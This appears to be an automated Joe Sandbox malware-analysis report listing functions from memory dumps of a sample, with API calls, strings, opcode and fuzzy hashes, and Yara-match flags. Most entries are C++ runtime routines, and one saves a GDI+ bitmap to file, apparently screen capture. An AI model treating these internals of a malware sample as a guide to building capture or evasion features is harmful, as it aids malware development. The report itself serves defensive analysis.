GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,A9583DAD), ref: 00428DE8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,A9583DAD), ref: 00428E61

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D

Function 02534FB9 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02534FCA
int.LIBCPMT ref: 02534FE1

Part of subcall function 0253BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0253BFD4
Part of subcall function 0253BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0253BFEE

std::locale::_Getfacet.LIBCPMT ref: 02534FEA
std::_Facet_Register.LIBCPMT ref: 0253501B
std::_Lockit::~_Lockit.LIBCPMT ref: 02535031
__CxxThrowException@8.LIBVCRUNTIME ref: 0253504F

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: ec391766753ead2822bb400198551142b55828c1d6fd8cf56af9d50ce41fe52e
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: 53118631D0021A9BCB16EBA4C844ABD77B6BF88314F942519E415BB2D0EB759A05CFD8

Function 00404D52 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
int.LIBCPMT ref: 00404D7A

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404D83
std::_Facet_Register.LIBCPMT ref: 00404DB4
std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
__CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD

Function 0253C3F0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0253C401
int.LIBCPMT ref: 0253C418

Part of subcall function 0253BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0253BFD4
Part of subcall function 0253BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0253BFEE

std::locale::_Getfacet.LIBCPMT ref: 0253C421
std::_Facet_Register.LIBCPMT ref: 0253C452
std::_Lockit::~_Lockit.LIBCPMT ref: 0253C468
__CxxThrowException@8.LIBVCRUNTIME ref: 0253C486

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: 25a5f30fa2cf807fe8ea9bb7be3bb4aaac569da2b34182320a7c40ecb6fe37dd
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: DE11A571C0021A9BCF16FBA4D844AFD7B76BF84726F54151AE811BB290DF349A05CFA8

Function 02534E7B Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02534E8C
int.LIBCPMT ref: 02534EA3

Part of subcall function 0253BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0253BFD4
Part of subcall function 0253BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0253BFEE

std::locale::_Getfacet.LIBCPMT ref: 02534EAC
std::_Facet_Register.LIBCPMT ref: 02534EDD
std::_Lockit::~_Lockit.LIBCPMT ref: 02534EF3
__CxxThrowException@8.LIBVCRUNTIME ref: 02534F11

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 45d2b1ef74b23c41013dd39b494a047b72100c7bab22725c5207873de77a7fc3
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: D911A531C0021A9BCF16EBA4D844AEE77B6BF84315F141519E410B72D0DF749E05CF99

Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
int.LIBCPMT ref: 0040C1B1

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
std::_Facet_Register.LIBCPMT ref: 0040C1EB
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
__CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99

Function 004054D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
int.LIBCPMT ref: 004054FA

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00405503
std::_Facet_Register.LIBCPMT ref: 00405534
std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
__CxxThrowException@8.LIBVCRUNTIME ref: 00405568

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C

Function 0040556E Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
int.LIBCPMT ref: 00405596

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040559F
std::_Facet_Register.LIBCPMT ref: 004055D0
std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
__CxxThrowException@8.LIBVCRUNTIME ref: 00405604

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C

Function 00404C14 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
int.LIBCPMT ref: 00404C3C

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404C45
std::_Facet_Register.LIBCPMT ref: 00404C76
std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
__CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98

Function 00404E63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404E6A

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
__Getcoll.LIBCPMT ref: 00404EC4
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4

Strings

fJ@, xrefs: 00404EBE

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID: fJ@
API String ID: 1836011271-3478227103
Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99

Function 0042FEE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A

Strings

mscoree.dll, xrefs: 0042FEFD
CorExitProcess, xrefs: 0042FF0F

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C

Function 0041CE0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
__CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66

Strings

pScheduler, xrefs: 0041CE50

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 3657713681-923244539
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D

Function 025708F1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 025708F8
make_shared.LIBCPMT ref: 02570943

Strings

RCC, xrefs: 0257092A
MOC, xrefs: 0257091B
v)D, xrefs: 025708F3

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchmake_shared
String ID: MOC$RCC$v)D
API String ID: 3472968176-3108830043
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: 3c0a44128f1b05d231612711cff467832a60e93af6c1bc78e53d24a8c6d4f381
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 81F06271A40665DFEB16FF64C42066C3BB5BF91B04F858092F8409B2A0CB789944CFA9

Function 0255B36D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction ID: 3a9003fa5d6923801c7fd147ed74bab762c7c134aeb6b96c03e68952767aeacf
Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction Fuzzy Hash: FE7192719002269BCB358F54C8A8ABEBF76FF45318F14462BEC1157188E7708D41CBA9

Function 0042B106 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9

Function 02560CAB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0256390E: RtlAllocateHeap.NTDLL(00000000,0253DAD7,00000000), ref: 02563940

_free.LIBCMT ref: 02560DB6
_free.LIBCMT ref: 02560DCD
_free.LIBCMT ref: 02560DEC
_free.LIBCMT ref: 02560E07
_free.LIBCMT ref: 02560E1E

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction ID: 03dbcc4c27796df2142c7e865aa96c50ea83c4d5c3b94d3b62e66c7715ff67aa
Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction Fuzzy Hash: 4F51B171A00705AFDB21DF69CC45B7ABBF5FF48724B14466AE809D7290E732E901CB88

Function 00430A44 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

_free.LIBCMT ref: 00430B4F
_free.LIBCMT ref: 00430B66
_free.LIBCMT ref: 00430B85
_free.LIBCMT ref: 00430BA0
_free.LIBCMT ref: 00430BB7

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88

Function 02561742 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 025617B4
_free.LIBCMT ref: 025617D4

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: c3a72839cc19a57367bf6799d2f7de13e9e88197d86bb0879fa5941230e2a4cd
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: BC41CF36A006049BCB14DF78C984A7DB7F6FF85724B1585A9DA05EB381DB31E901CB88

Function 004314DB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043154D
_free.LIBCMT ref: 0043156D

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84

Function 0043689D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
__alloca_probe_16.LIBCMT ref: 00436922
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
__freea.LIBCMT ref: 0043698E

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94

Function 0254B12D Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0254B152

Part of subcall function 02541188: _SpinWait.LIBCONCRT ref: 025411A0

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0254B166
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0254B198
List.LIBCMT ref: 0254B21B
List.LIBCMT ref: 0254B22A

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction ID: 6f31d45baccf06a3b71c62bfe2d2f27e9bb8b52c511be8a157a2d2c56bbb8308
Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction Fuzzy Hash: C3316432E05656EFCB14EFA4C9906EDFBB2BF8430CF04406AC81567681CF31AA54CB98

Function 0041AEC6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041AEEB

Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
List.LIBCMT ref: 0041AFB4
List.LIBCMT ref: 0041AFC3

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A

Function 00402038 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
GdipAlloc.GDIPLUS(00000010), ref: 00402072
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
GdiplusShutdown.GDIPLUS(?), ref: 004020E3

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
String ID:
API String ID: 2357751836-0
Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8

Function 025350C6 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 025350A3
